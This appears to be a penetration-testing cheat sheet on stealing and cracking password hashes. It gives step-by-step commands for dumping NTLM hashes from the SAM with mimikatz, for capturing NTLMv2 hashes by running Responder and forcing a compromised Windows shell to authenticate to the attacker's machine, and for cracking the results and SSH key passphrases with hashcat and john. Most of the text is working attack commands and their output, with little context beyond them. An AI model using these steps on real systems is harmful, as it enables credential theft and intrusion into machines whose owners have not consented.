Hash Cracking
There are different hashes to be cracked we'll see how to crack some of them which are most common ones and define how you can crack rest of them
NTLM Cracking
How To get NTLM HASH
| Condition :You should have administrator access on a machine to get NTLM of other users on the machine.
Step 1. Start PowerShell as administrator
Step 2. Get minmikatz.exe on the machine and execute it .
See the methods to downloads files in windows machine.
Step 3. Execute mimikatz commands to get the hashes
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
<hashes of other users will be displayed>
Step 4 Save the hash in a file and use hashcat to crack it.
hashcat -m 1000 ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Rules are optional if you want to use a rule to mutate the passwords in the list or not.
NTLMv2 Hash Cracking
How to get NTLMv2 HASH
| Condition : This attack is performed to crack NTLMv2 can be obtained in many ways, If you have access to a shell and you don't have the password.
Step 1. Start Responder in your kali machine
sudo responder -I eth0
Step 2. Send request to the Kali from the shell
dir \\<IP of Kali machine>\test.txt
When you try to access the share machine will authenticate it self with hash that you can crack.
Step 3. Crack the captured Hash.
hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force
Cracking SSH Private Key Passphrase
Sometimes private keys are locked with passphrase so we in order to use it we have to extract the Hash and then crack to get the password
For this we will use a tool ssh2john
Extract The HASH
ssh2john id_rsa > ssh.hash
Crack The Hash
john --wordlist=/usr/share/wordlist/rockyou.txt ssh.hash
Cracking Net-NTLMv2
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force